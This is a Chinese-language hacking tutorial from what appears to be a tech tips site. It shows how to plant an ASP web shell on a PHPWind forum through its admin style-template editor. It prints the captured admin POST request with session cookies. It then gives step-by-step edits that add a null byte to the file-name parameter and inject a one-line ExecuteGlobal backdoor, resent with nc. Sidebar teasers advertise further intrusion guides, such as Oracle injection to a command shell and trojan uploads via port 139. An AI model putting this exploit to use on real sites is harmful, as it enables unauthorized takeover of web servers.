尝试用后台漏洞入侵phpwind论坛
事发一星期前,在入侵一个PHPWIND论坛时的成果,适用于PHPWIND不能上传,而网上盛传的三种拿SEHLL方法都无效,可以一试,应该算是PHPWIND后台的漏洞
准备工具:winsock专家 v0.6 betan1 一只;UE-32.EXE一只;NC.EXE一只,电脑一台(只见一堆砖头飞过。。。。)
开工了,首先打开winsock 然后启动IE,进入后台,(哪个又在丢砖头。。。)
进入风格插件>>>>风格模板>>>>添加风格.在第一项,此风格在image目录下的文件夹名称:填TEST或FUCKCNN。。然后按提交。
然后点 [返 回 继 续 操 作] 找到刚才新建的风格,点编缉,
这里就要轮到winsock出场了...
打开IE进程抓包随便改点什么,如下面的98%改成97%.这里关键的是把数据包抓下来,其它的没所谓
一共二条数据如下:
1:
POST /phpwind/upload/admin.php?adminjob=setstyles&verify=bb457aae& HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://x22222.h21.ttrr.com/phpwi ... n=edit&sid=test
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 2.0.50727)
Host: x22222.h21.ttrr.com
Content-Length: 473
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 9f9e2_lastpos=T3; 9f9e2_ol_offset=97; 9f9e2_threadlog=%2C2%2C; 9f9e2_winduser=C20FAgIEVABSV1RYUAQDVwICDVcAA1MDVwcGBwEFUgUABGg%3D; 9f9e2_ck_info=%2F%09; 9f9e2_lastvisit=7102%091208851845%09%2Fphpwind%2Fupload%2Fread.php%3Ftid%3D3; 9f9e2_ipfrom=32f09dc105198e55683b704b0f8fbc6b%09%B9%E3%B6%AB%CA%A1%0D; 9f9e2_readlog=%2C1%2C2%2C3%2C; 9f9e2_adskin=0; 9f9e2_cknum=CFZUCggDVABSDDtoA1ZRB1VTCQVUCgJVUwMGAQpXBgdcB1FWWwUHAgFWVlA%3D; 9f9e2_AdminUser=CFZUCggAXQVVBDsAVV4MWmgHWF0BBlUPUAZTDQZTBlIAVlcDXFIGVFNWAVFQUFADBTo%3D
2:
action=edit&step=3&sid=test&setting%5B0%5D=test&setting%5B1%5D=wind&setting%5B2%5D=1&setting%5B7%5D=97%25&setting%5B8%5D=98%25&setting%5B3%5D=%23fff&setting%5B4%5D=%232f5fa1&setting%5B5%5D=%23B6D9E3&setting%5B6%5D=%23D4EFF7&setting%5B9%5D=%2376BAC2&setting%5B10%5D=%2376BAC2&setting%5B11%5D=%23005681&setting%5B12%5D=%235495A0&setting%5B13%5D=%23F7F7F7&setting%5B14%5D=%23D6E8CB&setting%5B15%5D=%23659b28&setting%5B16%5D=%23ffffff&setting%5B17%5D=%23F4FBFF&setting%5B18%5D=
分别把他们存为a.txt和b.txt
重点到了,我们打开b.txt,把第三个参数sid=test改为test.aspa,在最后的参数改为setting%5B18%5D=%0D%0C%3C%25ExecuteGlobal+request%28%221%22%29%25%3E简化点就是[回车符]<%executeglobal>
存盘,可以了,然后查看一下b.txt的大小530字节.套套是给他作好了,再给他带上看看,
好,现在我们把b.txt的内容复制到a.txt的最下面,再用ue-32打开a.txt,把下面这行Content-Length: 473改成Content-Length: 530,然后切换[到十六进制模式]把刚才修改的第三个参数sid=test.aspa改为sid=test.asp ,注意,这个 为十六进制的00 .存盘,
用NC.EXE发送
OK,现在让我们上FTP看看有没有生成TEST.ASP(当然,如果是入侵的话就直接用一句话客户端去连拉)
要记得你生成的文件在bbs.xxxxxxxxx.com/data/style/test.asp
总结:漏洞产生的原因是跟很久以前的动网上传漏洞一样,没有考滤00这个字节,当我们把生成文件参数后面加上00时,phpwind就以为程序结束,然后就会直接生成我们想要的asp.有很多人问,能不能直接生成PHP呢,这个我也一直在试,但都是没有办法,因为PHP会把我们输入的一句话包含到单引号里面,这样我们的一句话就不能执行了,而ASP单引号不影响我们的执行,由于本人不懂PHP.所以不知道有没有其它的办法,希望本文丢(拋字怎么打也打不出来)砖引玉.让高手来解决这个问题
学习编程的五种推荐方案 basic语言的优缺点
如果您想学习编程,却又不知从何入手,那么您不妨看看下面的几种学习方案,可能会给您一些启示吧!方案一 Basic语言 & Visual Basic优点(1)Basic 简单易学,很容易上手。(2)Visual Basic 提供了强大的
详情2018-02-13 19:29:26责编:llp 来源:驱动管家php开源网站内容管理系统:dedecms存在sql注入漏洞
dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统。近日,网友在dedecms中发现了全版本通杀
详情2018-02-28 17:34:59责编:llp 来源:驱动管家通过oracle注入直接取得主机cmdshell的方法
原文发表在黑客手册linx 2008 1 12介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS DBMS_EXPORT_EXTENSION… 改成 xxx jsp?id
详情2018-02-13 20:20:26责编:llp 来源:驱动管家保护电脑有哪些方法?这七招可以防止黑客入侵电脑系统
第一招、屏幕保护在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一
详情2018-02-12 20:40:28责编:llp 来源:驱动管家使用流光4.7扫描139端口,入侵网站的方法
1 通过流光 、X-way或其他扫描程序扫到139端口机器建议用流光4 7,顺便可以破解到Admin密码2 开始=>运行=> cmd 回车3 下面开始工作,按图上步骤在此不细说上传了木马自己可以控制了twunk exe是我上传木马的名称自己试试吧
详情2018-02-08 18:07:47责编:llp 来源:驱动管家远程软件怎么访问硬盘?远程软件访问硬盘的方法?
很多时候当一台计算机中毒以后,我们的远控软件就会查看到你硬盘的重要数据,从而将之盗取。我们怎么防止这种情况出现呢?其实您可以把硬盘加密码。但是如果入侵者用远控软件访问就不需要输入密码,直接就能访问
详情2018-01-09 08:52:31责编:llp 来源:驱动管家谈谈csrf的攻击原理 什么是csrf?
CSRF攻击原理解析Author: rayh4c [80sec]EMail: rayh4c 80sec comSite: http: www 80sec comDate: 2008-9-210×00 前言在Web程序中普通用户一般只在Web界面里完成他想要的操作,Web程序接受的正常客户端请
详情2018-01-18 13:30:58责编:llp 来源:驱动管家又拍图片管家支付漏洞介绍 怎么修复又拍图片管家支付漏洞?
又拍网旗下又拍图片管家v yupoo com在对支付进行处理时,未使用SSL安全连接,也没有对购买时间进行限制。导致当购买时间为负数时,不但不会从帐户中扣除相应的金额,反而还会对帐户进行充值。这里以续费VIP服务为
详情2018-02-09 17:23:26责编:llp 来源:驱动管家什么是dns欺骗攻击?dns欺骗攻击怎么防范?
你是否遭遇过这样的情况?当你在浏览器中输入正确的URL地址,但是打开的并不是你想要去的网站。它可能是114的查询页面,可能是一个广告页面,更可能是一个刷流量的页面,甚至是一个挂马的网站。如果你遇到了上述情况话,那么极有可能你遭遇了DNS欺骗。
详情2018-01-13 12:29:36责编:llp 来源:驱动管家设置wep加密的无线网络密码怎么破解?
近些年无线技术发展迅速,越来越多的用户使用无线设备在自己家建立起无线网络,通过搭建无线网络可以在家里的每个角落使用笔记本和无线网卡访问internet。有很多文章都向大家介绍了无线安全之中的通过设置WEP加密
详情2018-01-13 16:24:37责编:llp 来源:驱动管家
- 无法安装显卡驱动怎么办 显示超出频率范围的解决办法
- Windows7正版系统彻底解决驱动问题
- ug6.0软件打开出现nx许可证错误的解决办法
- qq同步助手是什么?qq同步助手怎么使用
- 安钛克P8机箱怎么样 安钛克P8机箱评测
- R3 1300X和R5 1400哪个好 R3-1300X对比R5-1400评测
- 无人驾驶测试车程达到800万公里
- 锤子很大概率会上“刘海”屏幕
- 电脑的风扇转速怎么看?教你用360安全卫士查看电脑风扇转速
- Win7系统出现蓝屏错误代码为BlueScreen是什么原因?怎么解决
- 夏日电脑自动重启原因分析和处理方法
- 任务栏输入法图标不见了?显示输入法图标消失的修复方法
- 给新手的关于中兴u950官方强制升级教程
- 全方位评析酷比max3 酷比max3什么时候出?
- 电脑无法在IE浏览器新选项卡中打开链接怎么办 IE新选项卡无法打开链接的解决方法
- 台式机连接蓝牙音响没声音怎么回事 台式机蓝牙连接音响没声音快速解决办法
- 入侵设置bt服务器的leadbbs的超难度过程
- 什么是or注入漏洞?fcblog有哪些漏洞?
- Win7怎么卸载显卡驱动?试试这个简单的方法
- 万能驱动怎么用 万能驱动使用教程